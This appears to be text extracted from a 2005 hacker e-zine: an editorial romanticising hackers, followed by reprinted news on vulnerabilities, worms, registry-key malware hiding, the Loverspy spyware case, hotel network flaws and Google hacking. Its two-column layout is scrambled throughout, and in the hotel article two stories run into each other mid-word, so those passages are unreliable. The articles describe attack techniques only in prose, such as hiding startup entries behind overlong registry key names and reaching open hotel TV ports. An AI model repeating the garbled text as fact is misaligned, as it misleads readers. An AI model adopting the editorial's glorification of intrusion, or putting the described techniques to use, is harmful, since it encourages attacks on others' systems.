You are on page 1of 84

Computer crime had scared most of us, human-beings.

This crime is usually associated


with the term "Hacker". Well, my friend let me tell u this: the real "Hackers" aren't "thieves"
or “criminals”, but some young people with great intellectual capacity that could help
building a more secure Internet. They could be useful to your company, business or
security. Just give them a chance and you'll see.

The term "Hacker" for many means a person that steals user information, money, breaks
software, create viruses or invade your privacy. Well, my friend, this is wrong. A Hacker is
Ccucu, really a very good programmer with high brain capacity and you shouldn't confuse them
Chief Editor with Crackers or Carders. The problem is that a Hacker is always misunderstood. His
actions are generally un-offending or harmless. Maybe he's just bored...

But, we shouldn't forget that the best Internet "terrorists" are highly trained programmers.
The reasons why they do this could be various: from simply trying to prove that they are
‘better than others’ to the ‘will to do something new’ or ‘just spend their time in others way
than usual’. But the worst is when a Hacker motivates his actions by the lack of chance he
gets from society or the lack of money. And here comes the new aspect: it all starts with
some little mean action, and, very soon (and this is because they always know what they
are doing) become more confident in their actions and take advantage of rich or naive
people and this is when the transformation takes part: the Hacker becomes a “Cracker” or
a “Carder”.

A good example is that of Romanian Hacker, Calin Mateias. Calin Mateias was indicted by
a US court for conspiring to steal $10m of computer equipment from Ingram Micro. It
seems that the Romanian "Hacker" operates under the name Dr Mengele; he hacked into
the computer company’s systems and placed over 2000 fraudulent orders for goods before
he was caught. He also had several contact people in the US who helped Calin Mateias to
sell the equipment he ordered. His accomplice was also charged at the hearing in L.A., if
convicted Mateias could face up to 15 years in prison. Calin was once a great Hacker. He
crossed the line and paid for his actions hard and strong. And so, the world lost a great
Hacker and a very promising programmer. And this is only a little example. Most crimes
aren't brought in the light because it is a small one or the company might feel ashamed.
Most of Internet "terrorists" steal between $100-400. They pay for their crimes as everyone
else does, but they aren't seen by the large public. But somehow when big companies or
governmental organizations hear about them they try to get them to work for them, to use
their knowledge and stop others that make the same mistakes they did before. They
rehabilitate them so that they can lead their lives in a respectful way. Ex: In the movie ‘Bad
Boys’ the police (Will Smith & Martin Lawrence) get a hacker out of jail and as him to hack
into a ex-cop’s files to solve a case, and later in the sequel ‘Bad Boys II’ you can see the
same hacker working in the police force, and helping them.

Real Hackers aren't just a few. They are in fact a very well organized community and there
are even Hacker’s trials. The best will win the money that others hope to steal and also win
what everybody wants: RESPECT. Also, there are even sites that put up challenges to
Hackers: for example decrypt some code by another Hacker and if their good they can put
up a challenge of their own. If jogging is a hobby to someone, same is here. But a large
community pushes it to extreme and hacking becomes a drug, a good but dangerous job.
Many know that real hackers work for big companies or NASA or other government facility
or organization and you won't see them making jail.

But if this phenomenon isn't controlled and we don't give these high-gifted youngsters real
opportunities, we shouldn't be wondering how young John from your street is on the TV as
a "big star”, as a Carder or one of the most wanted Crackers that crawl over the Internet.

Ccu
Digitally signed by
Ccucu He'll be like Osama Bin-Laden of the World Wide Web. So encourage them, use their
DN: cn=Ccucu, c=US, knowledge for your protection, or say like a great person once said “Hack me, baby!”
o=Ccucu, ou=Ccucu's
WareZ, email=forumc.
tk@gmail.com

cu Reason: I am the
author of this document
Date: 2005.10.07
20:39:07 +03'00'
Flaws revealed in Adobe Version Cue
Company has issued a patch for vulnerabilities

Two new security vulnerabilities were revealed this The flaws were discovered by an individual
week in Adobe Systems' Version Cue software, the who only wanted to be identified by his online
second and third security flaws discovered in the code name, "vade79," and were submitted to
company's software in less than two weeks, according iDefense through its Vulnerability Contributor
to security consulting firm iDefense. Program, Sutton said.
Both flaws allow local attackers to gain root privileges
to a machine through Version Cue, the file-version Sutton said the flaws are "far from the sexiest
manager in Adobe's Creative Suite software, vulnerabilities we’ve ever seen" since they can
according to Michael Sutton, director of iDefense only be exploited by local attackers, meaning
Labs at iDefense, a VeriSign Inc. company. they already must have access to the machine
to exploit the flaws. Also, the flaws only affect
One flaw is a "library loading vulnerability" that versions of Creative Suite for Apple OS X, so
enables potential hackers to load a custom library by there is a "limited user base" that is affected, he
executing a method from the command line of said.
VCNative, a root application in Version Cue, said
Rich Johnson, a senior security engineer with Still, the vulnerability risk is made more
iDefense Labs. In this way, someone could take full significant by the fact that the flaws are
control of a system and gain root privileges, thus relatively easy to exploit once a user has access
enabling them to introduce malicious code. to a machine, and there is already exploit code
that could be used to take advantage of the
The other way someone could gain root privileges vulnerabilities that has been released publicly,
through Version Cue is to exploit the log file created Sutton said. Though he does not know where
when the root application VCNative begins running, the code originated, it can be found on the Web
he said. The log file is always called the same thing, site of the French Security Incident Response
and if a person "knows what it's called they could put Team, www.frsirt.com, Sutton said.
a file in there that would allow redirection of that file
to a location of choice, then can override special With the discovery of the Version Cue
system files with this," Johnson said. vulnerabilities, there have now been three flaws
discovered in Adobe's software in less than two
Though published reports claimed that the flaws affect weeks. On Aug. 16, Adobe issued its own
the most recent version of the suite, Creative Suite 2, security advisory on a buffer overflow
an Adobe spokesman said in an interview Tuesday discovered in Adobe Acrobat and Adobe
that this is not the case. The flaws only affect the Reader. The company immediately issued a
previous Creative Suite release, which came out in product update to patch the flaw.
August 2003, said Bob Schaffel, senior product
manager of Version Cue for Adobe. The recent spate of vulnerabilities are not
indicative of a lack of overall security in
Adobe already has issued a patch for both Adobe's software platform, but instead are the
vulnerabilities, which can be downloaded at inevitable result of developing a broad portfolio
http://www.adobe.com/support/security/main.html#vc of software, Schaffel said.
uemac, he said.
"I don’t think this should be seen as some kind
of internal trend," he said. "When you consider
the broad number of products and the
enormous amount of code [we develop], every
now and then something like this manages to
slip through."
The Threat
Source:
from Within
The Threat from Windows Worm
Within Variants Emerge,
Even the best virus protection and network security
won't shield your company from a virus if one of your Attack
employees downloads it intentionally. While any
company can be the target of internal sabotage, a recent
survey of security and HR execs by risk management
consultancy Risk Control Strategies shows that
companies with between 500 and 900 employees are the
most at risk: twenty-three percent of those companies
have been victimized by internal sabotage through virus
downloads in the past two years.

On Wednesday, four new variants of the ZoTob worm


had been detected by F-Secure in Finland, bringing the
total to 11, said Mikko Hypponen, the company's
manager of anti-virus research. He said the variations
apparently had been programmed to compete with each
other -- one worm will remove another from an infected
computer.

Several new variants of a computer worm emerged


Wednesday to attack corporate networks running the
Windows 2000 operating system, just a week after
But even if you pull a Trump and fire troublesome
Microsoft Corp. warned of the security flaw.
employees, the threat won't go away. According to a
recent study by the U.S. Secret Service and CERT,
As experts predicted, the Windows hole proved a
which analyzed 49 cases of insider computer sabotage,
tempting target for rogue programmers, who quickly
most incidents were carried out via remote access, and
developed more effective variants on a worm that
less than half of the saboteurs had authorized access at
surfaced over the weekend and by Tuesday had snarled
the time of the incident. The report concludes: "The
computers at several large companies.
power of a terminated employee with system
administrator access should not be underestimated."

Source: Malware may hide


behind long names in
Windows registry
Security experts have found a vulnerability in the Windows
operating system that could allow malware to lurk
undetected in long string names of the Windows Registry.
Hidden-code flaw in Windows renews
worries over stealthly malware
A flaw in the way that several security programs and systems utilities detect system
changes could allow spyware to spread surreptitiously and have renewed worries about
stealthier attack code.

Last week, the Internet Storm Center, a group of security The creators of more advanced rootkits--software
professionals that track threats on the Net, flagged a flaw in designed to stealthily and completely compromise a
how a common Microsoft Windows utility and several anti- system--are starting to add memory hiding to their bag
spyware utilities detect system changes made by malicious of tricks, said Greg Hoglund, CEO of software analysis
software. By using long names for registry keys, spyware firm HBGary and author of the recently published
programs could, in a simple way, hide from such utilities yet ROOTKITS: Subverting the Windows Kernel. Hoglund
still force the system to run the malicious program every discussed the technique at the Black Hat Security
time the compromised computer starts up. Briefings and DEF CON hacker convention in July.

Already, some spyware authors seem to be playing with the "Spyware is the biggest problem right now, and the
rudimentary technique to try and hide their programs, said people that are writing it are starting to get a clue, and
Tom Liston, a handler for the Internet Storm Center and a that's a scary trend," Hoglund said.
network security consultant for Intelguardians.
The potential for hiding the execution of programs using
"We have seen indications that someone is trying this overly long registry keys, on the other hand, is much
technique out," Liston said. "Basically, we have seen code smaller, because Microsoft and affected security
that is stuffing a key in the registry with a huge length. Yet, software vendors will likely fix the affected utilities
the author still doesn't have it working." soon, he said.

A Microsoft representative said that the company is "None of the people that I know who are writing rootkits
investigating the report, but does not consider the problem an would not use this method to hide the key," he said.
operating system flaw.
The technique involves using a registry key whose name
is longer than 256 bytes. The Windows Registry holds
important system data, including what programs to run
at startup. The long key and any of its subkeys are not
seen by the affected utilities, but can be read by the
system just fine. By using the technique, a malicious
program could run every time a computer is started, but
keep its execution a secret from the utilities, the Internet
Storm Center said.

Programs that apparently cannot detect malicious


"Our early analysis indicates that this attempt to bypass these software using the registry technique include AdAware,
features is not a software security vulnerability, but a Microsoft's Anti-spyware Beta, Norton SystemWorks
function within the operating system that could be misused," 2003 Pro, Registry Explorer and WinDoctor, according
the company said in a statement. "Microsoft is reviewing the to an ISC posting. The Internet Storm Center could not
report to determine further details and whether there is any create a definitive list, because the programs apparently
potential impact for customers and will provide appropriate acted differently on non-English versions of Windows.
customer guidance if necessary."
Symantec, the creator of the Norton brand of system
The potential threat comes as more malicious software has utilities, is the owner of SecurityFocus.
started to use various techniques to attempt to escape
detection. Some attackers have merely used targeted Trojan
The technique works against Microsoft's RegEdit utility,
horses and customized spyware to evade defensive software.
but other system utilities, such as Reg.exe and the
Such techniques are believed to be the reason that a
Microsoft Configuration Editor, are not affected, the
sustained attack on U.S. and U.K. government agencies and
software giant stated.
industry has largely gone unnoticed.
'Loverspy' Spyware
Creator Indicted, On
the Run
Allegedly violated U.S. computer privacy laws,
Feds say.
The creator of Loverspy, software to surreptitiously
The developers of the affected programs are already observe individuals' online activities, has been indicted
working on fixes for their products. If Microsoft fixes for allegedly violating U.S. federal computer privacy
the RegEdit issue, it may also solve the issue for other laws.
vendors, ISC's Liston said.
If convicted, Carlos Enrique Perez-Melara, could face a
"It should be something that Microsoft should be able maximum sentence of 175 years in prison and fines of
to address in the next monthly update," he said. up to $8.75 million. His current whereabouts are
"There are a lot of programs out there that do things unknown.
like look at the registry that are affected by this."
While the technique may only be useful for a limited Four individuals who purchased Loverspy to illegally
time, spyware authors will likely incorporate it into spy on others were also indicted.
their programs, said Joe Stewart, senior researcher for
security firm Lurhq. Another major threat, bot "This federal indictment--one of the first in the country
software, will likely not use the technique, he said. to target a manufacturer of "spyware" computer
software--is particularly important because of the
"Spyware usually does a much better job of hiding damage done to people's privacy by these insidious
itself in the registry than bot software," Stewart said. programs," John Richter, acting assistant attorney
"Even though bots are often used for spyware, adware general of the U.S. Department of Justice's Criminal
or other financially motivated activity, they are Division, said in a statement. "Law enforcement must
programmed as if they were just general-purpose continue to take action against the manufacturers of
utilities--for some reason they almost always go with these programs to protect unsuspecting victims and seek
the tried-and-true 'Run' registry key." punishment for those responsible for wreaking havoc
online."
System integrity checkers and security software Perez-Melara, 25, was indicted last month on 35 counts
should attempt to detect more surreptitious techniques of manufacturing, sending, and advertising a
like registry hiding, added HBGary's Hoglund. surreptitious interception device (the Loverspy
program), unlawfully intercepting electronic
communications, disclosing unlawfully intercepted
Hoglund and two other researchers have modified a
electronic communications, and obtaining unauthorized
common rootkit using techniques, ironically, taken
access to protected computers for financial gain. Each
from a way of protecting against buffer overflows, a
count carries a maximum penalty of five years in prison
common software flaw. The memory cloaking allows
and a maximum fine of $250,000.
a rootkit to run its own code while hiding that code
His indictment was returned on July 21 by a federal
from detection by the operating system.
grand jury sitting in the U.S. District Court for the
Such techniques will likely become common in
Southern District of California in San Diego, but the
malicious software in the near future, he said.
indictment was unsealed only Friday.
Hoglund stressed that security software makers have
to start thinking more like attackers and adding more
advanced detection capabilities to their products.

"If your security tools aren't also using rootkit-like


techniques, then they can be subverted easier," he
said.
Source:
Secret Monitoring
Zotob Arrest Breaks
Perez-Melara advertised and sold Loverspy and
EmailPI software over the Internet for $89 a copy to
people looking to secretly monitor an individual's e-
Credit Card Fraud
mail, passwords, chat sessions, and instant messages,
as well as the Web sites they visit. Purchasers of the
Ring
program could log into a Loverspy Members Area on Turkish officials have identified 16 more
the Loverspy and EmailPI Web sites and choose an e- suspects this week in a continuing crackdown
card and greeting that would be sent to the victim. on illegal online activity that stems from the
Loverspy would arrive hidden inside the e-card and arrest of two men in connection with the Zotob
would launch when the victim opened the card. After
being installed, Loverspy would send regular reports Internet worm.
collating the victim's online activities either directly to
the purchaser of the spy software via e-mail or to
Perez-Melara, who would then forward the reports to
the purchaser. The spyware also enabled the purchaser
to remotely control the victim's computer to the extent
of altering and deleting files, and surreptitiously The 16 individuals are believed to be connected to a
turning on any Web camera hooked up to the victim's credit card theft and identity theft ring, but not directly
computer. involved with the creation or dissemination of Zotob,
From around July 1, 2003, until October 10, 2003, according to Paul Bresson, an FBI spokesperson.
approximately 1000 individuals in the United States
and abroad bought Loverspy and sent e-cards The action followed the arrest of Atilla Ekici, 21, in
containing the application to around 2000 people, Adana, Turkey on Aug. 26 in connection with the recent
according to the authorities. Around half of those Zotob Internet worm and with Mytob, another wide-
2000 are known to have had their computers spreading worm that first appeared in February.
compromised and their communications intercepted,
the indictment stated. The antivirus software of the Little information was available on the arrests Tuesday,
day didn't identify Loverspy as dangerous, so it didn't which was a holiday in Turkey. Officials contacted by
block the program's installation, the indictment noted. eWEEK at the U.S. Consulate in Adana and at the U.S.
Perez-Melara's operations were shut down after the Embassy in Ankara said they had no information on the
FBI executed a federal search warrant for his San additional arrests.
Diego apartment on October 10, 2003.
The victims named in the indictment are located in
California, Hawaii, Missouri, New Hampshire, North However, links between Ekici, who used the online
Carolina, Pennsylvania, and Texas. handle "Coder," and co-conspirator Farid Essebar, an
18-year-old resident of Morocco who was known online
as "Diabl0," would not be surprising, security experts
Others Indicted said.
Both men are believed to have controlled large networks
The four other individuals indicted with Perez-Melara of compromised computers, or "botnets," according to
by the federal grand jury in San Diego are John Joe Stewart, a senior security researcher at managed
Gannitto of Laguna Beach, California; Kevin Powell security provider LURHQ Corp.
of Long Beach, California; Laura Selway of Irvine,
California; and Cheryl Ann Young of Ashland, Bot networks are frequently used to harvest information
Pennsylvania. They are each charged with two counts- or intellectual property from compromised machines, as
-unauthorized access to protected computers (via well as for distributing spam, advertising and viruses.
Loverspy) in furtherance of other criminal offenses
and illegally intercepting the electronic
communications of their victims. Each of the two Microsoft Corp. and the FBI were cooperating in an
counts carries a maximum penalty of five years in investigation of botnets before Zotob was released, said
prison and a maximum fine of $250,000. Tim Cranton, a senior attorney at Microsoft and director
Other purchasers of Loverspy have been prosecuted of the company's Internet Safety Enforcement team.
by federal authorities in Charlotte, North Carolina,
Dallas, and Honolulu. Prosecutions are going ahead in Cranton declined to comment on whether Microsoft's
Kansas City, Missouri, and Houston. All known investigators were on to Diabl0 before Zotob, but said
Loverspy victims have been notified by e-mail that the company had "developed a lot of intelligence" about
they were targeted by the program, according to the the botnets Diabl0 operated prior to Essebar's arrest and
authorities. that the information "helped inform" the actions of law
enforcement.
The 16 new suspects may be operating their own botnets
using variants of Zotob or the earlier Mytob worms,
which Essebar is believed to have created.
Is Malware Hiding
According to Stewart, each member of the group would
in Your Windows
probably be given a copy of the source code by Essebar
and would compile it into a unique Mytob or Zotob Registry?
variant, with its own IRC (Internet Relay Chat) server Security company says vulnerability could
and channel details, then release the variant on the allow malicious software to lurk undetected.
Internet and build a botnet out of hosts the worm
compromises.
Security experts have found a vulnerability in the
Windows operating system that could allow malware
"There would be no reason for them not to have their to lurk undetected in long string names of the
own botnets," he said. In fact, a sizeable botnet is almost Windows Registry.
a requirement for those who move in the Internet According to a security advisory by Denmark-based
underground, where the slightest online provocation can IT security company Secunia, the weakness is caused
invoke a denial-of-service attack from another botnet by an error in the Windows Registry Editor Utility's
operator. handling of long string names. A malicious program
could hide itself in a registry key by creating a string
with a long name, which would allow the malicious
string and any created after it in the same key to
remain hidden, according to Secunia. Keys are stored
in the Windows Registry, which saves a PC's
configuration settings.
Secunia has confirmed that the vulnerability affects
While the other suspects in the case may be acquainted the "Run" registry key, according to the advisory.
with Diabl0 and Coder, Stewart said it's wrong to think Malicious strings in this key will be executed when a
of the botnet operators as a tightly coordinated group. user logs in to the PC.
Affected Systems
"It's really just individuals and small groups of botnet The vulnerability affects Windows XP and Windows
owners who get together," he said. 2000 and has been confirmed to exist on fully updated
XP systems with Service Pack 2 and Windows 2000
systems with Service Pack 4, according to Secunia.
While Diabl0 and Coder were not the largest botnet Microsoft issued a statement on the vulnerability
operators, they were very successful and their creations saying it is investigating the weakness and is not
generated a lot of "noise" on the Internet, he said. Virus aware of any malicious attacks that have exploited it.
researchers at Sophos PLC's SophosLabs said that Moreover, the company asserted that the vulnerability
Diabl0 is believed to be behind about 20 other virus by itself could not allow an attacker to remotely or
variants, including Mydoom-BG and versions of the locally attack a user's computer. It could only be
Mytob worm. exploited if the computer had its security
compromised in some other way or was already
Together, the variants accounted for six of the top 10 running malicious software.
viruses and more than 54 percent of all viruses reported In its advisory, Secunia provided several solutions to
to Sophos in August, the company said. avoid exploitation of the vulnerability, one of which is
to ensure that systems have up-to-date anti-virus and
"It will good to see them go," Stewart said. spyware detection software installed.
The security company also said it is possible to see the
Source: hidden registry strings with the "reg" command-line
utility of the Windows Registry, and that the
"regedt32.exe" utility on Windows 2000 is not
affected by the weakness.
Among the greatest concerns in
U.S. Agencies Take government IT shops is the vulnerability of
wireless networks and mobile devices, the
Security Into Their Own survey found. CISOs remain worried about
unauthorized wireless access points,
Hands unauthorized wireless deployments and
rogue WiFi devices.
Chief information security officers at federal agencies are more
concerned about the quality of the software they buy than they "We know that every agency has wireless
were a year ago, and they are beginning to integrate security somewhere, whether they admit it or not,"
functions directly into their daily operations rather than relying Stephan said.
on outside help, according to a study released today.
Although wireless is prevalent throughout
The study, based on a survey conducted by Intelligent the government, fewer than half of the
Decisions Inc., found that these and other changes in CISO
outlook reflect a growing maturity of the role of IT security organizations surveyed had adopted
within the government. After many years of struggling to security controls recommended by the
implement a basic security framework, government agencies National Institute of Standards and
are turning to more complex issues. Technology. The recommendations include
comprehensive policies, security tool
configuration requirements, monitoring
programs and policy training. Next month
NIST is expected to float new wireless
security guidelines, which will evolve into
new mandates.

"They've got the systems administration component of security


down," said Roy Stephen, cyber security director at Intelligent
Decisions, in Ashburn, Va. "Before, people thought you could
just put a firewall at the edge of the network. [Now] you need
intru-sion detection mechanisms on each machine." Symantec, CipherTrust load
Last year, CISOs typically sought training and installation with
up security appliances
the purchase of new technology, but increasingly they are Much like most enterprise-class IT tasks, security
showing confidence that their own systems administrators can can become weaker when a company network is
handle deployment and management. In a similar vein, the bogged down with too many devices.
survey revealed that security operations are being rolled back Management borders on the impossible and IT
into network operation centers rather than being approached as can never quite get as clear a picture of its own
separate functions. security as it needs.
"People are not as interested in getting specialized cyber
security help. They're more interested in having it built into
their daily functions," Stephen said, Three indicted in U.S. spam
The survey also showed that federal CISOs are spending
crackdown
considerably more time on compliance with the 2002 Federal Three people accused of sending massive
Information Security Management Act than they have in the amounts of spam face possible prison sentences
past, which came as a surprise to the study's authors. CISOs after being indicted by a grand jury in the U.S.
spend an average of 3.75 hours a day on compliance activities, state of Arizona and accused of violating the
compared to 3.06 hours one year ago. CAN-SPAM Act of 2003 and other charges, the
U.S. Department of Justice said in a statement.
"We had hoped that FISMA would get easier and more
automated as time went on," Stephen said. "The CISO is
spending more time on it himself or herself. It just shows how
big a concern it is."
Use Ad-Aware to Cover NIST launches new
Your Tracks vulnerability
database
The National Institute of Standards and Technology
has launched a new vulnerability database to help
security professionals learn about and correct
vulnerabilities.

The database, known as the National Vulnerability


Database (NVD), integrates all publicly available U.S.
government resources on vulnerabilities and provides
You probably know that Lavasoft's Ad-Aware program sniffs out links to industry resources, according to NIST. It is
adware on your system, but did you know that the free utility can built on a dictionary of standardized vulnerability
also erase your browser's search and Address histories, eliminate names and descriptions called common vulnerabilities
Word's list of recently opened documents, and clear the record of and exposures.
files played in Windows Media Player? These privacy protectors,
and many others, are available every time you complete an Ad- About 300 new vulnerabilities are discovered each
Aware scan. month, according to NIST.

After you download and install the program, choose the second Updated daily, the NVD contains information on
button from the top-right corner to open the integrated almost 12,000 vulnerabilities. It allows users to search
WebUpdate tool, and ensure that you have the most recent list of by a variety of characteristics, including software
adware definitions. With your new definitions in place, click the name and version number; vendor name; and
Scan now button on the left, choose Perform smart system scan, vulnerability type, severity and impact, the agency
and click Next. When the scan finishes, click Next again to see said. The database can also be used to research the
the scan results. vulnerability history of a product and view
vulnerability statistics and trends.
The entries listed under the Critical Objects tab are files that Ad-
Aware has identified as potential threats to your privacy. Use the The NVD was developed by researchers in the NIST's
program's Knowledge Base and Threat Assessment Chart to Computer Security Division in conjunction with the
determine whether to delete the files: Click Help, Contents, Department of Homeland Security's National Cyber
double-click Support, and choose either entry to view more Security Division.
information. (Note that many of the "threats" may be relatively
harmless tracking cookies that you might find useful when you
return to the sites that left them. For example, a cookie left by a
shopping site may display items similar to those you've recently
purchased on the site.) Check the files you want to delete, and
choose Quarantine.

Now click the Negligible Objects tab to see the 'Most Recently
Used' files list. The list tracks the documents you've opened lately
in such applications as Adobe Reader and Microsoft Office, the
terms you've entered in your browser's search and Address fields,
and your file-download history, among other activities. Check the
items you'd like to erase, click Quarantine, give the file a name
(such as old history), and click OK twice. Choose Next and
OK once more to view the scan results.
Identity Theft Is Out of Control
More than 7 million people are victims
of identity theft each year—or nearly "Two servers or even two different Web sites can
20,000 thefts a day—according to work together to verify information like this, but
Gartner Research and Harris without either one of them knowing enough to
Interactive. Many thefts occur because answer or find out the answers themselves," says
of casual mistakes in the offline world: Dr. Burt Kaliski, chief scientist for RSA Labs. Even
handing a credit card to the wrong if someone hacks the servers, they can't access your
person or scribbling your Social information.
Security number on a sheet of paper someone can
find. But many more are facilitated by the Internet, Others are working to provide stronger
which still has a long way to go when it comes to authentication via hardware devices. Charles
protecting our privacy. Palmer, head of security and privacy at IBM
Research, believes many online privacy woes can
Identity pirates can gather all sorts of confidential be solved by leveraging a security chip like the
information about you by prowling the Web. With a Trusted Platform Module, an IBM-developed
little more ingenuity, they can hack into your online device now championed by several industry players.
accounts—mining credit card numbers, addresses, and This kind of chip encrypts files and passwords,
telephone numbers. And if you let your guard down, making them readable only on your computer.
they can use underhanded techniques like phishing
and pharming to fool you into giving them
information. Social engineers con many people into
giving out sensitive data simply by asking for it.

Think you've taken the necessary precautions? Think


again. Virgil Griffith, a researcher at Indiana A4Vision's facial recognition software is one way to
University, recently found a hole in the system that authenticate identity.
affects us all. Most Web sites provide a way to access
password-protected accounts when you've forgotten Of course, you must also make sure that no one else
your password. When you sign up for an account, the can log on to your PC. That's where biometric
site typically asks you to fill in the answer to a authentication comes in. Fingerprint readers capable
common question, such as "What's your mother's of verifying your identity are already available for
maiden name?" or "What street did you grow up on?" desktops and laptops. Companies like Compaq,
If you forget your password, the site grants you access DigitalPersona, Ethentica, Identix, and Sony offer
when you answer this question. devices that attach via USB cable, and several IBM
laptops actually come with integrated readers. Other
Unfortunately, by trolling free public records in companies, including such names as Iridian
Texas, Griffith proved that anyone could track down Technologies and Visage, are offering retinal
mothers' maiden names for more than a quarter of the scanning and facial-recognition tools.
state's population.
A4Vision's facial-recognition technology can even
White hats—corporate security experts—look closely verify your identity continually. Projecting a light
at such holes. Researchers at RSA Security, for through a filter, the system creates a virtual grid
instance, are considering ways of improving so-called roughly four feet in width. As you step into this
knowledge-based authentication. They're developing a grid, it distorts to follow the topology of your face.
technology, code-named Nightingale, that lets sites A camera then measures the distance to your face at
verify answers to authentication questions without each point within the grid. These measurements are
actually storing those answers on their servers. unique, and when you step in front of the camera
once again, the system is able to identify you.

"We've used it in highly secure areas where


companies want to know who is behind a
workstation at all times," says CEO Grant Evans.
"Our system can observe the person and give
positive identification 14 or 15 times a second."
ID theft automated using
keylogger Trojan
Anti-spyware researchers have uncovered a massive
identity theft ring linked to keylogging software. The
malware was discovered by Patrick Jordan of Sunbelt
Software while doing research on the infamous
CoolWebSearch application but the key logger itself is
not CWS. It's far nastier.
During the course of infecting a machine, Jordan
discovered that the machine became a spam zombie that
was also sending data back to a remote server. He found
that thousands of infected machines are contacting a US-
based server daily and a portion of these are writing to a
keylogger file, which is periodically harvested by
cybercriminals. "The types of data in this file are pretty
sickening to watch. You have search terms, social
security numbers, credit cards, logins and passwords,
etc," Sunbelt president Alex Eckelberry writes.
You could even use biometrics to verify your
identity with a third party. The trouble is that when Sunbelt has contacted some of the affected individuals
you use traditional biometrics, there's always the to warn them their personal details had been exposed. It
danger that someone will hack into a machine has also informed the FBI. It remains unclear if the
where your fingerprint, retinal, or facial information keylogger is directly related to CWS or not. Sunbelt
is stored. Recognizing this problem, researchers at advises consumers to use a personal firewall to prevent
the Stevens Institute of Technology, Johns Hopkins the key logger from "phoning home".
University, Carnegie Mellon, and Florida State are
working on a biometrics system that can operate
without storing your physical data.

The system would use your typing or voice patterns


to store a code across two different tables of
information. "Simply by typing on your keyboard,
you could unlock the code," says Susanne Wetzel, a
Stevens Institute researcher, "but to an attacker, the
tables would look like random pieces of
information."

This only begins to describe the vast arsenal of


authentication and privacy projects under way at
universities and in corporate research labs. In the
The use of key logging software on an industrial scale is
years to come, identity theft will present a much
rare but not unprecedented. Malware can be
tougher challenge to would-be thieves.
programmed to send back sensitive information to
designated servers, in some cases logging into the
servers using passwords written into viral code. Security
researchers able to reverse engineer items of malware
Source: can extract this password and location information and
use it to monitor hacker activity.

Source:
Hotel hacking could pump smut into
every room
Hotel hybrid broadband internet and TV-on-demand entertainment systems are open to attack, security
researchers warn. Penetration testing firm SecureTest has identified a number of vulnerabilities in the
implementation of hotel broadband systems delivered using Cisco's LRE (long-reach Ethernet) technology.
Using a laptop connected to a hotel network, SecureTest found it was possible to control the TV streams
sent to each room or gain access to other user’s laptops.

The security holes uncovered call to mind the security


exploits in hotel infra-red controls recently uncovered
by Adam Laurie, technical director at secure hosting
outfit The Bunker. Ken Munro, managing director of
SecureTest, said that its research covered security
weaknesses in IP (as opposed to infra-red) systems.
During a stay in a hotel belonging to an unnamed
worldwide chain, a SecureTest staffer paid for internet
connectivity. He found TCP port 5001 open on the in-
Brazil cuffs 85 in
room IP enabled TV providing the service. Connecting
to this port a full TV maintenance menu was displayed
online bank hack
over which it was possible to carry out test procedures,
change channels or turn the TV on and off.

dragnet
According to SecureTest, a hacker might be able to
access this menu and configure the system to display
adult content on every TV channel. The port could also
be used to broadcast content directly from a laptop over
the TV. In theory, this could enable hackers to download
and broadcast any material throughout the hotel
complex.
Another vulnerability revolved around insecure network
configuration. There appeared to be no segregation
between client devices, creating a means for a user to
access other devices connected to the same hotel
network. The system scrutinised used a Cisco 575 LRE
box, which allows existing CAT2 (telephone) cabling to
carry on-demand services avoiding the need to roll out
CAT5 (twisted pair) cabling to each room.
The security risk lies not in terms of this technology but
in how it was implemented, problems SecureTest has
seen replicated at other hotels. During a previous
investigation, SecureTest used a different fixed
internet/TV hotel system implemented by another hotel
chain and located a connection to an internal FTP server.
This provided open access to information such as a
backup database of TV usage.
"A hacker or disgruntled employee could get their kicks
byy accessing and manipulating the TV menu, but this
er implications.
breach has much widBrazilian federalAn individual
police last week cuffed 85
own advertising
could broadcast their people across sevenor an activist
states their of hacking
suspected
e to every
own political messagonline bankroom," saidand
accounts SecureTest's
netting $33m,
Munro. "Moreover, fixed internet
Reuters access is inadequately
reports.
protected in many cases.
The People
arrests plug
were into a hotel
the culmination of a four-
network assuming it’smonth
a trusted connectioncodenamed
investigation, but it’s not."Operation
Unless they have a personal
Pegasus", firewall
whichrunning,
generatedfraudsters
105 arrest warrants.
can snoop on desktops A at leisure.
total of 410Hotels andtook
officers suppliers
part inofthe swoop.
guest entertainment systems need to act now to prevent
these scenarios."
Is Google Exposing You to Hack Attacks?
Hackers use search engine to find unsecured sites, networks, routers, and Webcams.

Getting In Via Google

Although security software can identify when


an attacker is performing reconnaissance work
on a company's network, attackers can find
network topology information on Google
instead of snooping for it on the network
they're studying, he said. This makes it harder
for the network's administrators to block the
attacker. "The target does not see us crawling
their sites and getting information," he said.

Often, this kind of information comes in the


Somewhere out on the Internet, an Electric Bong may be form of apparently nonsensical information--
in danger. The threat: a well-crafted Google query that something that Long calls "Google Turds." For
could allow a hacker to use Google's massive database example, because there is no such thing as a
as a resource for intrusion. Web site with the URL "nasa," a Google search
for the query "site:nasa" should turn up zero
results. Instead, it turns up what appears to be a
"Electric Bong" was one of a number of household list of servers, offering an insight into the
devices that security researcher Johnny Long came structure of the U.S. National Aeronautics and
across when he found an unprotected Web interface to Space Administration's internal network, Long
someone's household electrical network. To the right of said.
each item were two control buttons, one labeled "on,"
the other, "off." Combining well-structured Google queries with
text processing tools can yield things like SQL
Searching for Holes passwords and even SQL error information.
This could then be used to structure what is
known as a SQL injection attack, which can be
Long, a researcher with Computer Sciences Corporation
used to run unauthorized commands on a SQL
and author of the book Google Hacking for Penetration
database. "This is where it becomes Google
Testers, was able to find the Electric Bong simply
hacking," he said. "You can do a SQL
because Google contains a lot of information that wasn't
injection, or you can do a Google query and
intended to lie exposed on the Web. The problem, he
find the same thing."
said at the Black Hat USA conference in Las Vegas last
week, lies not with Google itself but with the fact that
users often do not realize what Google's powerful search Although Google traditionally has not
engine has been able to dig up. concerned itself with the security implications
of its massive data store, the fact that it has
been an unwitting participant in some worm
In addition to power systems, Long and other
attacks has the search engine now rejecting
researchers were able to find unsecured Web interfaces
some queries for security reasons, Long said.
that gave them control over a wide variety of devices,
"Recently, they've stepped into the game."
including printer networks, PBX (private branch
exchange) enterprise phone systems, routers, Web
cameras, and of course, Web sites themselves. All can
be uncovered using Google, Long said.

But the effectiveness of Google as a hacking tool does


not end there. It can also be used as a kind of proxy
service for hackers, Long said.
bOnline scammers ChoicePoint hacker
exploiting Katrina indicted
disaster The man who received 16 months jail time for
dealing in personal information taken from
Internet criminals wasted no time in exploiting the ChoicePoint has now also been indicted for
hurricane Katrina disaster, immediately fraudulently accessing consumer financial records.
orchestrating online donation scams and sending
malicious email. Nigerian Oluwatunji Oluwatosin could face up to 22
